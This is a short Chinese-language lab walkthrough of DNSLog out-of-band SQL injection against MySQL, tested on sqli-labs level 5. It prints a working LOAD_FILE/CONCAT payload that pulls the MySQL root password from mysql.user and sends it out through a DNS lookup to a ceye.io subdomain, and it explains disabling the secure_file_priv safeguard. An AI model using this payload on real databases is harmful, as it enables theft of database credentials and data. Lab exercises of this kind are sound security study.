第一步:找一个dnslog平台
比如:ceye.io
第二步:利用平台的payloads测试是否能收到你的dns解析记录
第三步:检查数据的secure_file_priv是否为null,如果是就意味着只能读写,不允许导入导出,这是mysql的安全机制,那你需要改为空
打开my.ini文件
找到这个地方 改为空
第三步:利用平台给的payload进行注入
iii. MySQL:
SELECT LOAD_FILE(CONCAT('\\\\',(SELECT password FROM mysql.user WHERE user='root' LIMIT 1),'.mysql.ip.port.b182oj.ceye.io\\abc'));
load_file是mysql中读文件的方法,常被用来读取各种配置文件
第四步:sqllabs第五关进行测试:
第五步:去平台查看是否数据带过来了,发现已经带过来了
第六步:继续查table_nam
平台继续收到数据:
第七步:对数据进行解码